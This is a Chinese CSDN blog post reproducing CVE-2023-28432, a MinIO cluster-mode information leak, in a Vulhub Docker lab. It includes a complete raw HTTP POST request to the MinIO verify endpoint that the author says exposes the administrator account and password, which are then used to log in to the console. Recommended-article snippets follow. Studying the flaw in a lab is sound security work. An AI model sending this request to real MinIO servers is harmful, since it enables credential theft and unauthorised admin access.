每日一漏洞(CVE-2023-28432)

已于 2023-07-09 15:37:30 修改
阅读量552 收藏
点赞数 1
文章标签: 安全
于 2023-07-08 13:44:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjj1029056414/article/details/131611042
版权
文章详细描述了如何使用Vulhub和docker-compose一键搭建环境来复现Minio的CVE-2023-28432漏洞。通过向http://ip:9000/minio/bootstrap/v1/verify发送POST请求,可以揭示管理员账号和密码。这些凭据随后可用于在http://ip:9001的Web管理页面登录并访问后台。
摘要由CSDN通过智能技术生成

环境

vulhub一键搭建

cd vulhub/minio/CVE-2023-28432
docker-compose up -d

漏洞复现

访问http://ip:9001Web管理页面,访问http://ip:9000是API服务

这个漏洞在api节点http://ip:9000/minio/bootstrap/v1/verify上

poc

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

结果

可以查看到管理员的账号,密码

使用账号密码在http://ip:9001页面进行登录,能进入后台

炼金术师诸葛亮
关注
CVE-2023-28432 MinIO 信息泄露漏洞--漏洞复现10
nnn2188185的博客
04-08 7053
MinIO是美国MinIO公司的一款开源的对象存储服务器, 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息。泄露的信息中包含登录账号密码。 CVE-2023-28432 CNNVD-202303-1795
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 668
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
CVE-2023-28432 MiniO信息泄露漏洞复现
Love&Share
04-28 6537
MiniO 是一个基于 Apache License v2.0 开源协议的对象存储服务。它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等在集群部署的 Minio 中,未授权的攻击者可发送恶意的 HTTP 请求来获取 Minio 环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录 Minio,分布式部署的所有用户都会受到影响,单机用户没有影响。
重要信息:关于 Oracle RAC 环境下 Apache Tomcat 漏洞CVE-2024-21733)的解决方案
JiekeXu的博客
08-14 1872
作者 | JiekeXu来源 |公众号 JiekeXu DBA之路(ID: JiekeXu_IT)如需转载请联系授权 |(个人微信 ID:JiekeXu_DBA)大家好,我是 JiekeXu,江湖人称“强哥”,荣获 Oracle ACE Pro 称号,墨天轮 MVP,墨天轮年度“墨力之星”,拥有 Oracle 11g OCP/OCM 认证,MySQL 5.7/8.0 OCP 认证以及 PCA...
MinIO漏洞 CVE-2023-28432
qq_38613494的博客
01-16 1045
MinIO集群模式中存在一个信息泄露漏洞。攻击者可以利用该漏洞获取存储在MinIO中的敏感数据。等待文件迁移完毕后,可以关闭两个minio,将旧版minio的start.sh替换成新版的启动脚本,保持原本的端口。新版本的minio,根据情况设置bucket的作用范围为:public。
CVE-2023-28432-MinIO集群模式信息泄露漏洞流量分析
12306小哥
07-12 802
MinIO是一个开源对象存储系统。在其版本(不含)以前,集群模式部署下存在一处信息泄露漏洞,攻击者可以通过发送一个POST数据包获取进程所有的环境变量,其中就包含账号密码和。
每日漏洞cve-2023-25157,cve-2023-23752)
jjjj1029056414的博客
07-07 394
每日复现一漏洞cve-2023-25157GeoServer OGC Filter SQL注入漏洞cve-2023-23752Joomla权限绕过漏洞
每日漏洞CVE-2023-32315)
jjjj1029056414的博客
07-09 514
openfire路径穿越漏洞
每日漏洞cve-2021-45232)
jjjj1029056414的博客
07-27 117
复现漏洞cve-2021-45232(Apache APISIX Dashboard API权限绕过导致RCE)
CVE-2023-28709
08-24
CVE-2023-28709是Apache Tomcat的拒绝服务漏洞,该漏洞属于中危级别。漏洞编号为CVE-2023-28709和CNNVD-202305-1931。这个漏洞涉及的软件是Apache Tomcat版本2023.24998.11-M0至0.2.11-M0。目前对于该漏洞的状态还...
CVE-2023-28432:MinIO信息泄露漏洞利用工具安装与使用教程
最新发布
gitblog_00836的博客
09-12 529
CVE-2023-28432:MinIO信息泄露漏洞利用工具安装与使用教程 项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2023-28432 项目概述 本教程将引导您了解并使用由Mr-xn维护的关于CVE-2023-28432的信息泄露漏洞利用工具。此项目针对的是MinIO对象存储服务中发现的一个严重安全漏洞,允许未认证的远程攻击者通过特定请求获取敏感环境...
【1day】复现CVE-2023-28432(MinIO信息泄露漏洞
记录并分享学习安全的知识点..
04-13 1478
复现CVE-2023-28432(MinIO信息泄露漏洞
探索云存储安全之门——CVE-2023-28432的核检之旅
gitblog_00490的博客
09-12 301
探索云存储安全之门——CVE-2023-28432的核检之旅 CVE-2023-28432 CVE-2023-28434 nuclei templates 项目地址: https://gitcode.com/gh_mirrors/...
漏洞复现】CVE-2023-28432 MinIO集群模式信息泄露漏洞
m0_53121608的博客
07-16 2816
漏洞复现】CVE-2023-28432 MinIO集群模式信息泄露漏洞
Goby漏洞更新 | MinIO verify 接口敏感信息泄露漏洞CVE-2023-28432
m0_46699477的博客
03-24 4154
MinIO verify 接口敏感信息泄露漏洞CVE-2023-28432
MinIO集群模式信息泄露漏洞CVE-2023-28432
EnerY3的博客
12-12 5183
Minio 是一个开源的对象存储服务,它是一个完全兼容 Amazon S3 的存储系统,可以用来构建可扩展的应用程序。Minio 的主要目标是为开发人员提供一个可靠、安全、可扩展的对象存储系统,以便他们可以专注于构建自己的应用程序,而不是存储基础设施。漏洞编号:CVE-2023-28432漏洞评分:高(Critical)影响版本:MinIO 2022.10.0至2023.4.20间的所有版本漏洞描述:MinIO集群模式中存在一个信息泄露漏洞。攻击者可以利用该漏洞获取存储在MinIO中的敏感数据。
mysql安全漏洞CVE-2023-0215
07-29
很抱歉,但我无法回答关于"mysql安全漏洞CVE-2023-0215"的问题。因为在您提供的引用内容中,并没有提到与该漏洞相关的信息。如果您有其他关于该漏洞的引用内容或更多的背景信息,我将很乐意为您提供帮助。 #### 引用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值